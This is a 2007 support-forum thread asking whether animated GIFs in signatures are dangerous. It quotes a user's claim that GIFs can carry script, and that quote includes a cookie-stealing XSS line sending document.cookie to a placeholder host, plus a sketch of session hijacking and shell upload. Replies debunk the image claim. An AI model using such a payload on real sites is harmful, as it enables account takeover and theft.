News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

animated gifs dangerous?

Started by jbryant, January 17, 2007, 05:41:23 AM

Previous topic - Next topic

jbryant

Is it true that allowing animated gifs in the signature or avatar is dangerous?

This was posted on my forum by one of my more experienced foreign users:


<"script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script">

this is something that could be emplemented into a gif pic or as swf flash animated thing ... this will steal the cookie of people who visit the page that the pic is in ...

if you dont know what a cookie is ... or how it is used to hack accounts ... try this


login to the forum
after you login
in the address bar (url bar) whipe every thing and write
javascript:alert(document.cookie)

you will get a pop up window with stuff in it ...
one is SMF*** or something ...
if i got that for any user
i can use inline javascript to change my user to the user i got his cookie ...
that means his personal stuff will no longer be personal ... and if as admin visited the page with the gif or the swf ...

admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

thats if the hacker was a samrt one and wannet to do that

why do you think that scripts are not allowed in forums and stuff like that?

cause its soooooooooo much danger.




How do I disable the gif in the signature if this is true?
Thank you in advance.
Check out our live cam community....WaynesvilleLive.com

Dannii

Animated gifs aren't any more dangerous than any other type of image, and I'm pretty sure that the risk is extremely low. You can't embed a script in an image like that.
"Never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise."

Daniel15

You can not embed a script in an image! An image is just that: An image. It can't contain anything else.

As far as I know, Flash itself can not read your cookies, it needs a seperate JavaScript to do so (I could be wrong, though)

Quoteadmin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

thats if the hacker was a samrt one and wannet to do that
Sounds like a script kiddie to me :-\
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!


Advertisement: